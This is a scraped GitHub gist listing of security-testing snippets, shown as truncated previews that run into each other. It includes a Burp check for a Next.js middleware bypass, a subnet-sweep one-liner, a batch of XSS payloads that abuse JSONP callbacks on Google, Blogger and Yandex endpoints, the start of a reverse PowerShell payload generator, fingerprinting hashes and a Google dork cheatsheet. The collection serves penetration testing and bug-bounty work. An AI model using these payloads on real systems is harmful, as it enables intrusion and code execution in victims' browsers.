@and0x00
and0x00 / CVE-2025-29927.bcheck
Created July 7, 2025 00:49 — forked from fourcube/CVE-2025-29927.bcheck
Burp BCheck for CVE-2025-29927 (Next.js middleware bypass)
metadata:
language: v2-beta
name: "CVE-2025-29927 - Next.js middleware bypass"
description: "Checks for differences in responses when using different x-middleware-subrequest header paths"
author: "Chris Grieger - blueredix.com"
tags: "next.js", "middleware"
run for each:
middleware_value = "pages/_middleware",
"middleware",
and0x00 / waf-smoke-test.sh
Created April 12, 2025 17:10 — forked from ridjex/waf-smoke-test.sh
Lightweight Bash script to test basic WAF (Web Application Firewall) protections against common SQL injection and XSS payloads. Use this to quickly assess your web application’s surface against low-hanging injection vulnerabilities.
#!/bin/bash
# 🚀 Discover More: Testing Your Firewall in 60 Seconds: A Lightweight WAF Testing Script That Anyone Can Use
# Learn how this script works and the best practices for WAF testing.
# Read the full article here:
# 👉 https://medium.com/@kochuraa/testing-your-firewall-in-60-seconds-a-lightweight-waf-testing-script-that-anyone-can-use-a7a725fefcb7
# Safe WAF Tester Script
# Usage: ./waf-smoke-test.sh <URL> [-o output.md] [-H "Header: Value"]
# Examples:
# Scan IP range
LOS_24_IP="ENTER_IP_TO_SCAN";IP=$(echo $LOS_24_IP | cut -d"." -f1,2,3);for i in $(seq 1 255); do NEW_IP=$(echo $IP.$i); (timeout .1 openssl s_client $NEW_IP 2>&1 | grep -q "connect:errno" && echo "$NEW_IP,up" 2>/dev/null) 2>/dev/null ;done
#Google.com:
"><script src="https://www.google.com/complete/search?client=chrome&q=hello&callback=alert#1"></script>
"><script src="https://googleads.g.doubleclick.net/pagead/conversion/1036918760/wcm?callback=alert(1337)"></script>
"><script src="https://www.googleadservices.com/pagead/conversion/1070110417/wcm?callback=alert(1337)"></script>
"><script src="https://cse.google.com/api/007627024705277327428/cse/r3vs7b0fcli/queries/js?callback=alert(1337)"></script>
"><script src="https://accounts.google.com/o/oauth2/revoke?callback=alert(1337)"></script>
#Blogger.com:
"><script src="https://www.blogger.com/feeds/5578653387562324002/posts/summary/4427562025302749269?callback=alert(1337)"></script>
#Yandex:
"><script src="https://translate.yandex.net/api/v1.5/tr.json/detect?callback=alert(1337)"></script>
id: suspicious-extensions-rce
info:
name: Suspicious File Extensions - Potential RCE
author: Nullenc0de
severity: medium
description: Detects files with potentially suspicious extensions that could be used for Remote Code Execution (RCE). Scan your AppData folder.
file:
- extensions:
and0x00 / favicon_hashes.txt
Created April 7, 2024 17:30
A list of favicon pre-computed hashes for various frameworks.
6399cc480d494bf1fcd7d16c42b1c11b:penguin
09b565a51e14b721a323f0ba44b2982a:Google web server
506190fc55ceaa132f1bc305ed8472ca:SocialText
2cc15cfae55e2bb2d85b57e5b5bc3371:PHPwiki (1.3.14) / gforge (4.6.99+svn6496) - wiki
389a8816c5b87685de7d8d5fec96c85b:XOOPS cms
f1876a80546b3986dbb79bad727b0374:NetScreen WebUI or 3Com Router
226ffc5e483b85ec261654fe255e60be:Netscape 4.1
b25dbe60830705d98ba3aaf0568c456a:Netscape iPlanet 6.0
41e2c893098b3ed9fc14b821a2e14e73:Netscape 6.0 (AOL)
a28ebcac852795fe30d8e99a23d377c1:SunOne 6.1
and0x00 / DOM3D.js
Created March 28, 2024 22:31 — forked from OrionReed/dom3d.js
3D DOM viewer, copy-paste this into your console to visualise the DOM topographically.
// 3D Dom viewer, copy-paste this into your console to visualise the DOM as a stack of solid blocks.
// You can also minify and save it as a bookmarklet (https://www.freecodecamp.org/news/what-are-bookmarklets/)
(() => {
const SHOW_SIDES = false; // color sides of DOM nodes?
const COLOR_SURFACE = true; // color tops of DOM nodes?
const COLOR_RANDOM = false; // randomise color?
const COLOR_HUE = 190; // hue in HSL (https://hslpicker.com)
const MAX_ROTATION = 180; // set to 360 to rotate all the way round
const THICKNESS = 20; // thickness of layers
const DISTANCE = 10000; // ¯\\_(ツ)_/¯
and0x00 / DutchGov.txt
Created August 4, 2023 18:08 — forked from random-robbie/DutchGov.txt
Dutch Gov - bug bounty scope - feel free to add more if you know they are in scope - taken from - https://www.communicatierijk.nl/vakkennis/r/rijkswebsites/verplichte-richtlijnen/websiteregister-rijksoverheid
and0x00 / mkpsrevshell.py
Created July 1, 2023 23:49 — forked from tothi/mkpsrevshell.py
reverse PowerShell cmdline payload generator (base64 encoded)
#!/usr/bin/env python3
#
# generate reverse powershell cmdline with base64 encoded args
#
import sys
import base64
def help():
print("USAGE: %s IP PORT" % sys.argv[0])
and0x00 / GoogleDorking.md
Created June 7, 2023 20:29 — forked from sundowndev/GoogleDorking.md
Google dork cheatsheet

Search filters

| Filter | Description | Example |
| --- | --- | --- |
| allintext | Searches for occurrences of all the keywords given. | allintext:"keyword" |
| intext | Searches for the occurrences of keywords all at once or one at a time. | intext:"keyword" |
| inurl | Searches for a URL matching one of the keywords. | inurl:"keyword" |
| allinurl | Searches for a URL matching all the keywords in the query. | allinurl:"keyword" |
| intitle | Searches for occurrences of keywords in title all or one. | intitle:"keyword" |